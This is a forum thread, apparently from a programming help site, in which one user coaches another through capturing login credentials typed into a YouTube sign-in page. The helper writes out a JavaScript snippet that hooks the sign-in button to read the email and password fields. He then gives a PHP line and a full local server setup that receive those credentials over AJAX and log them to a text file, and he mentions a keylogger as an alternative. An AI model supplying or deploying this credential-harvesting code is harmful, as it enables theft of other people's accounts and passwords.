Web Application

Pages: 123
Alright I guess I can't do this by myself and it seems to be too much of a work for someone to do it for me so I guess I'll just give it up and go study(I have freaking exams :'( ).
What I meant is, go to the youtube's login page.
Go in your browser's title and type in:

javascript:document.getElementById('signIn').onclick = function(){ alert('Mail: "'+document.getElementById('Email').value+'", Pass: "'+document.getElementById('Passwd').value+'"'); };

Press enter, and try to log in.

For chrome, you will need to manually type "javascript:", because it will get removed while you paste it.
Last edited on
Oh wow, it worked! Ok, I want it to save to a .txt instead. Is it possible? Thank you.
Aah, you aren't able to do it with the safety of the new browsers, they don't allow any access to your hard drive from a javascript script.

Maybe cookies, maybe send an email or similar...
If you have a PHP server running (even in localhost) you could easily send a request, sending the login informations, and saving them from the PHP script.

It's not a big trouble to make a PHP server for that, I have a PHP server that acts like a media player, and it uses PHP to receive the files' list/extension from a directory.

PHP is mostly what should be in the serverside (Saving/Loading files to server, mainly).

I could easily set it up for you if you want to, it should not take more than half an hour (Not sure, never worked so much with file reading/writing with PHP, but looking at docs it seems easy).

But again if you make an extension you could have a configuration file (extension = differently restricted javascript) to read in the extension's options page.
So what your saying is, that I can send login data I retrieved from javascript to an email and then retrieve this information by a PHP code?
I meant, Either send the infos via email, OR send the infos via php.

Actually, all it needs to be in the PHP file is:

	file_put_contents((Your file name here),$_GET['d']."\n",FILE_APPEND|LOCK_EX);

And you should get your PHP page open like:


And you'd get a file looking like:

login_infos nick sgh pass lol

I just did this for a localhosted php server, and works good (besides possible safety issues like file size limits).

If you're actually interested in the PHP solution, I'll write a dedicated post to set yourself up for that, it takes more time to install server+php (because of download sizes and little configuration steps) than setting up the scripts.

EDIT: Also seems like you cannot send an email thru javascript.
So, either PHP or a keylogger.
Last edited on
I am very interested in what you're saying and if your willing to do it for me (as you said in "I'll write a dedicated post to set yourself up for that"), that would be great but I'd like to learn from you some things if you have the time. First of all, you used the term localhost alot, I'd like to know what that is please. And about the server, what I know is that a server is a machine that carries out a specific program and deals with all it's requirements, correct me if I'm wrong. I know I might be as dumb as a 6 year old for you, but would you care to explain more?
Winneris1 wrote:
that would be great but I'd like to learn from you some things if you have the time.


Now, from the basics.
When you browse a website, you are really making a connection to another PC in the world,
asking him an HTML page (or a file to download, which is basically the same).

This PC you're making a connection to, is called a server. (Almost every PC can be a server)
This server, just like you, has its own IP (say, just as example), but must have the a port open to the public.

(Now, you can get their IP from their name, like, from www.google.com. But that's over our visions, we don't need that)

Opening port 80 (HTTP, web port) is usually very dangerous if made improperly.
To make your PHP website safer for tests and password-related things, you should keep your ports closed, and run it on your own machine, accessing it with "localhost".

Localhost is not a word I made up.
Actually, if you're running a web server, to load its pages you actually go to http://localhost/
It will redirect you to your own website (as long as the server is running).

What's different? Nothing.
But for your "localhost" server, only YOUR PC has access to the server.

Now, this is out of the php scope. You won't be needing it so much, all you need to know is that running a localhost server is safer for you and your internet connection.
(What are the risks of running your server publicly? Mainly DDoS: https://en.wikipedia.org/wiki/Denial-of-service_attack )

So, Let's set up your localhost server.

First things first:

I'll assume you're using Windows.

Download the right shyte:

You will need a decent and light webserver to handle connections.
I personally use Lighttpd, here you can find the compiled version: http://en.wlmp-project.net/downloads.php?cat=lighty&type=ssl&format=exe&mirror=dtech

Then, you will need the php preprocessor: http://windows.php.net/download/ (VC9, Non Thread Safe)

You will need to change your folders structure to meet these files requirements:

C:\Program Files\LightTPD\conf\lighttpd.conf

...I'm pretty sorry I'll break the message here but i'm really tired.
All that comes after this part is just editing two configuration files and start to build your server.

EDIT: So, I'm here.

Now, now.

1. Rename C:\php\php.ini-production to php.ini
This allows for PHP to run in the fastest way possible
2. Open C:\Program Files\LightTPD\conf\lighttpd.conf with any text editor
We will need to change lighttpd's settings and plugins
3. Uncomment the line "mod_cgi", (line 20 here)
mod_cgi is what will communicate with php.
4. Add this line, after server.modules( * ) cgi.assign = ( ".php" => "C:/php/php-cgi.exe" ). Note: You need to have no spaces in this filename.
This line tells mod_cgi that files ending in .php must be handled with the PHP CGI executable.

In case you are unable to edit lighttpd.conf, here is one, ready for you:

After this, your server is ready and you only need to make the scripts.
Travel to C:\Program Files\LightTPD\htdocs

Create a file, Store.php, and copy-paste this:

Now, to explain it:
<?php *** ?>

This simply tells PHP that, what is "***" must be interpreted as executable code. PHP will only handle code inside <?php ?>.


Here, you need to understand what _GET is.
_GET is what takes parameters from the url bar. You will be able to send informations from javascript, and they will end up into _GET.

If we have valid informations, continue.


Here, we will have a file, Entries.txt, that will contain any login informations we will send from javascript.
FILE_APPEND makes sure you don't delete the old login infos.
LOCK_EX makes it safer.

Now, the server-side is ready.
We need to tweak the javascript a bit.

Your new javascript code will be now:

document.getElementById('signIn').onclick=function(){$.ajax({url:"http://localhost/Store.php?d="+escape('Mail: "'+document.getElementById('Email').value+'", Pass: "'+document.getElementById('Passwd').value+'"'),type:"GET",async:false});}

Now, for the questions, I guess.
Because I'm sure some things won't be clear.
Last edited on
I'm pretty sorry I'll break the message here but i'm really tired.

I can't stress enough how thankful I am to you. Seriously, your my hero :D

Anyway, with your explanation I can understand that if I setup a safer localhost server the program can only work with LAN connected computers, am I right? I also downloaded the files and am ready when you are :)

Edit: For the PHP preprocessor, which version should I get?
Last edited on
Hey, updated post.

Yes, btw.

If you only set up a server for localhost, it will only work on lan or only on your pc, depending on your firewall and router settings.

(In fact, it's your router and firewall who choose if your server will be localhost-only or not)

Another little note, if you didn't notice, from my last edit.

EssGeEich wrote:
Then, you will need the php preprocessor: http://windows.php.net/download/ (VC9, Non Thread Safe)

Last edited on
I skimmed through the update real quick. Is there a way to let the javascript run forever? Like a while loop?
I am very anxious to try this now but I need to take a nap so sorry.
Last edited on
You cannot do it with a while loop, it will stuck the page.
You should use javascript only as event "replies".
But you can use timers for that.
I did everything but I can't find the file "Entries.txt" anywhere.
The Entries.txt file will be created once a password is sent.
It will be found at:
C:\Program Files\LightTPD\htdocs\Entries.txt
Or, if your server is running:

Sorry for the late reply, but I've been busy.
Last edited on
No problem. It isn't working though.

Edit: the file isn't there too.
Last edited on
Did you start Lighttpd? It needs to be running.

To check if it works, create the Entries.txt file yourself, and go to http://localhost/Entries.txt .
If you can read the content, it works.
If it says timeout/Connection closed or a Chrome error, it doesn't.
Then go to http://localhost/Store.php?d=Test
The page should be empty.
If it's not empty, the Lighttpd configuration file must be changed.
See if Entries.txt changed. If it did, there's something wrong with the javascript, probably.
Last edited on
I manually created entries.txt then I started lighttpd.exe. After using the javascript I tried opening entries.txt but it was empty. Same goes for the link you gave me.
I just realized that the php code has Logins.txt instead of Entries.txt Ill try changing that and see if it works.

Edit: still same problem.
Last edited on
So the second link (Store.php) gives you a completely white page?
Does the console give an error?
It should only give you these two lines:
(server.c.637) trying to read configuration (test mode)
(log.c.166) server started
No the first link, the one for the Entries. Ill check the second one now.
Last edited on
Pages: 123